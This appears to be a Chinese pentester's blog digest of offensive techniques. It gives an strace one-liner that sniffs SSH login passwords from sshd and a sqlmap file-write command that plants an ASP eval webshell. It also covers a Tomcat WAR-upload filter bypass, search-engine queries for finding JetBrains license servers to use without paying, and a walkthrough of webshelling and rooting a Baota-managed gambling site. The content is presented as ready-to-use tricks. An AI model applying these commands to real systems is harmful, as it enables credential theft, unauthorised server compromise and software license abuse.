一直以来我都觉得EHole这个工具的指纹有点老,也有点少。最近发现这个项目EHole-magic感觉瞬间来精神了,他对EHOLE
这款工具增强了一些功能: * 支持Hunter
* 指纹库大幅度提升 * 根据命中的指纹打对应的POC * 爆破功能 加黑的两个是我觉得最赞的功能,也是我一直以来想做的。 后续可针对本次护网爆出来的漏洞,整理高可用的POC加入其中,更快更准的打点!
1.如何窃取Linux登录的账号密码(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/sshd.log &) grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/sshd.log
2.不出网的Mssql注入(中文目录写webshell) 上传一个bat文件并执行python sqlmap.py -r aaaaaaaa.txt --batch --file-write ahell.bat -file-dest c:\users\public\music\ashell.bat
bat的内容为echo ^<%%eval request("aaaaaa")%%^> >D:\\张三的马赛克\\Content\\images\\logo1.asp
3.Tomcat后台上传WAR包过滤该如何绕过 将文件后缀修改为xxx.w\\\ar
如果你不想使用任何的破解程序去激活你的JB家的东西,那么白嫖或许会成为你的不二之选。 在线收集版 但是很多都用不了,只能慢慢尝试 使用FOFA"Location: https://account.jetbrains.com/fls-auth?uid"
使用Hunterheader="Location: https://account.jetbrains.com/fls-auth?uid"
大爱!解决了多年来的愿望,将市面上的那些网络空间测绘引擎的数据爬下来,然后去重后在以WEB的形式展示在团队面前。这对于大型护网项目来说,可以解决极其多的时间和人力成本!
这里不去过多地关注怎么打的菠菜站,主要关注这里面的几个技术点 1.PHP写马失败,选择用base64+短标签绕过,Base64解密后是这个2.但是这样无流量加密的马失败,换哥斯拉完美解决问题 3.宝塔面板如何
bypass disablefunction
,文章中介绍的这个方法值得学习: * 寻找fpm文件路径:/www/server/php/56/etc/php-fpm.conf
* 查看Listen
字段,发现是在/tmp
下 * 最后使用哥斯拉的Bypassdisablefunction
的FPMBypass
来完成命令回显 4.提权 宝塔的Webshell一旦可以提权到root,其实就相当于拿下来整个宝塔面板 这里他在上传到服务器后发生了一些问题,文章中给出了解决办法:find / -name cc1 export PATH=$PATH:/usr/libexec/gcc/x86_64-redhat-linux/4.8.2/
这个值得一试,我很多时候就死在这个提权上了。 提权完成后的操作,我们有空继续说